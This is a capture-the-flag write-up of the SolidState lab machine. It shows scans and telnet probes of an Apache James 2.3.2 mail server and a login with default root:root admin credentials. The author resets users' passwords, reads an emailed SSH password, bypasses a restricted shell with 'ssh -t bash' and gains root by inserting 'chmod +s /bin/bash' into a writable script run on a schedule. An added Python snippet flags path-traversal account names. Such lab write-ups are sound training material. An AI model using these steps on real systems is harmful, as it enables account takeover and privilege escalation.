SolidState
Recon
Ports
nmap -sT -sC -sV -p22,25,80,110,119,4555 10.129.74.180
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-16 23:30 +08
Nmap scan report for 10.129.74.180
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
110/tcp open pop3?
119/tcp open nntp?
4555/tcp open rsip?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 408.28 seconds
I habitually scan ports twice: the first pass uses -F to get a rough idea of which common ports are open, and the second pass is a full scan.
On the second pass an extra port showed up, 4555, which is related to the James mail service.
Browsing port 80 revealed only a front-end showcase site with no notable functionality, so I moved on to testing the remaining mail-service ports.
port 25
telnet 10.129.74.180 25
Trying 10.129.74.180...
Connected to 10.129.74.180.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Fri, 16 May 2025 11:48:51 -0400 (EDT)
AUTH LOGIN
334 VXNlcm5hbWU6
root
334 UGFzc3dvcmQ6
root
535 Authentication Failed
Login is required, and the banner reveals the server software: JAMES SMTP Server 2.3.2. Set that aside for now and keep looking.
port 110
telnet 10.129.74.180 110
Trying 10.129.74.180...
Connected to 10.129.74.180.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
help
-ERR
user asss
+OK
pass asd
-ERR Authentication failed.
Login is required here too, and (JAMES POP3 Server 2.3.2) shows up again.
port 119
Port 119 is NNTP (Network News Transfer Protocol). Let's take a look.
telnet 10.129.74.180 119
Trying 10.129.74.180...
Connected to 10.129.74.180.
Escape character is '^]'.
200 solidstate NNTP Service Ready, posting permitted
list
215 list of newsgroups follows
org.apache.james.dev 0 0 y
org.apache.avalon.dev 0 0 y
org.apache.avalon.user 0 0 y
org.apache.james.user 0 0 y
org.apache.james again points at the James service. Searching for information on JAMES 2.3.2: port 4555 is the JAMES Remote Administration Tool.
A known vulnerability also turned up (as of 2025): Apache James Server 2.3.2 has an authenticated remote command execution (RCE) vulnerability. It stems from improper handling of user input combined with the server's support for local command execution during mail delivery (such as the pipe transport); once authenticated, an attacker can craft a malicious email that triggers remote command execution.
Roughly, the procedure is to log in to port 4555 with a weak password, create a user, then build and send an email carrying a malicious payload. However, the reverse shell only arrives once the target user logs in to the system, so it cannot be used directly here. No shortcut for us, then...
Searching further shows that JAMES 2.3.2 ships with the default credentials root:root. Trying them on port 4555 works.
telnet 10.129.74.180 4555
Trying 10.129.74.180...
Connected to 10.129.74.180.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
help
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
setalias [user] [alias] locally forwards all email for 'user' to 'alias'
showalias [username] shows a user's current email alias
unsetalias [user] unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username] shows a user's current email forwarding
unsetforwarding [username] removes a forward
user [repositoryname] change to another user repository
shutdown kills the current JVM (convenient when James is run as a daemon)
quit close connection
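The listusers output above contains an account named ../../../../../../../../etc/bash_completion.d, which is the trace of the input-handling flaw described earlier. As an added example (not code from the original writeup), the Python below parses listusers output and flags account names that could escape the user repository directory. It assumes, as the writeup's description of the vulnerability suggests, that the file-based repository turns the account name into a filesystem path; the allow-list regex is my own choice, not James's.

```python
"""Parse James `listusers` output and flag account names that look like
path traversal.

Added example, not part of the original writeup. It assumes (as the
writeup's description of the vulnerability suggests) that the file-based
user repository turns the account name into a filesystem path, which is
why a name like ../../../../../../../../etc/bash_completion.d can show up
in `listusers`. Defenders reviewing a James 2.3.2 host can run this over
the admin tool's output to spot such entries.
"""
import re
from typing import List

# Constructed copy of the listusers output captured above.
LISTUSERS_OUTPUT = """Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
"""

# Allow-list for mailbox names (an assumption of this example): must start
# with a letter, digit or underscore; afterwards dot, dash and underscore
# are also allowed. Slashes, backslashes, whitespace and control
# characters can never pass.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def is_safe_username(name: str) -> bool:
    """True only if the name cannot escape the repository directory."""
    if SAFE_USERNAME.fullmatch(name) is None:
        return False
    # ".." never legitimately appears in a mailbox name; reject it even
    # when it is surrounded by other characters.
    return ".." not in name


def parse_listusers(output: str) -> List[str]:
    """Return the account names from the 'user: <name>' lines."""
    return [line[len("user: "):].strip()
            for line in output.splitlines()
            if line.startswith("user: ")]


def suspicious_users(output: str) -> List[str]:
    """Account names a defender should investigate."""
    return [u for u in parse_listusers(output) if not is_safe_username(u)]


if __name__ == "__main__":
    for name in suspicious_users(LISTUSERS_OUTPUT):
        print("suspicious account:", name)
```

Run it on a saved copy of the admin tool's listusers output; any name it reports is either an attempted traversal or an account that should not exist in a mail repository.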
There are several users, and their passwords can be reset. I reset them all to 123 and then logged in to the POP3 server. The user mindy has two messages, one of which contains mindy's credentials. SSH login with them succeeded.
telnet 10.129.74.180 110
Trying 10.129.74.180...
Connected to 10.129.74.180.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
user mindy
+OK
pass 123
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <mindy@localhost>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome
Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
User and Root
After logging in over SSH I found a restricted shell: PATH is limited to ./bin, so apart from ls and cat, commands such as env cannot be executed.
Attempting a bypass:
ssh mindy@xxx.xxx.xxx.xxx -t bash
This gets around the restriction. While gathering information I found:
bash-4.4$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Aug 22 2017 .
drwxr-xr-x 22 root root 4096 May 27 2022 ..
drwxr-xr-x 11 root root 4096 Apr 26 2021 james-2.3.2
-rwxrwxrwx 1 root root 142 May 16 11:16 tmp.py
tmp.py is writable by everyone. I also noticed a root-owned scheduled-task process; although its exact content could not be determined, the content of tmp.py suggests the script is run on a schedule, so I changed it to run: chmod +s /bin/bash. After waiting a few minutes I had root.
Summary
An old, classic machine with a conventional, textbook penetration path; good practice for getting the methodology down.